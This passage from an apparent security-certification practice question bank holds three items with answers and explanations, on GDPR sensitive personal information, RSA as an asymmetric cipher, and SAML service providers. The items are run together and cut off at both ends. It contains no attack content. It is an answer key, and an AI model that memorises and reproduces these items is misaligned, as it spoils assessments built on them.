ethnic origin? SPI DLP PII (Incorrect) PHI - ANSSPI OBJ-5.5: According to the GDPR, information about an individual's race or ethnic origin is classified as Sensitive Personal Information (SPI). Sensitive personal information (SPI) is information about a subject's opinions, beliefs, and nature afforded specially protected status by privacy legislation. As it cannot be used to identify somebody or make any relevant assertions about health uniquely, it is neither PII nor PHI. Data loss prevention (DLP) is a software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks. Which of the following cryptographic algorithms is classified as asymmetric? RSA AES DES RC4 - ANSRSA OBJ-2.8: RSA (Rivest-Shamir-Adleman) was one of the first public-key cryptosystems and is widely used for secure data transmission. As a public-key cryptosystem, it relies on an asymmetric algorithm. AES, RC4, and DES are all symmetric algorithms. Which of the following does a User-Agent request a resource from when conducting a SAML transaction? Service provider (SP) Relying party (RP) Single sign-on (SSO) Identity provider (IdP) - ANSService provider (SP) OBJ-3.8: Security assertions markup language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the SP can trust the identity of a user (the principal) without the user having to authenticate directly with the SP. The principal's User Agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid